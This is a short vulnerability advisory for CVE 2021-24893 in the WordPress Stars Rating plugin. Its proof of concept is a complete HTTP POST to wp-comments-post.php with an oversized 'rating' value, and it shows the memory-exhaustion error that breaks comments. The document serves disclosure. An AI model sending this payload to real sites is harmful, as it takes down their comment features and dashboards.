Stars Rating < 3.5.1 – Comments Denial of Service | CVE 2021-24893

Description

The plugin does not validate the submitted rating, allowing submission of long integer, causing a Denial of Service in the comments section, or pending comment dashboard depending if the user sent it as unauthenticated or authenticated.

Proof of Concept

Enable rating for a post/page, add a comment, capture the request in Burp Change the POST Parameter "rating" to a large integer. 

POST /wp-comments-post.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 139
Connection: close
Upgrade-Insecure-Requests: 1

rating=1000000000000000000&comment=aa&author=aa&email=aa%40aa.com&url=&submit=Post+Comment&comment_post_ID=2123&comment_parent=0

Then forward it. The DoS can be seen in the pending comment dashboard for unauthenticated comments, otherwise (authenticated comment), the comment section on the post will not load properly and will have an error such as Allowed memory size of 268435456 bytes exhausted (tried to allocate 232783904 bytes) in /var/www/wp-content/plugins/stars-rating/public/stars-rating-public.php on line 312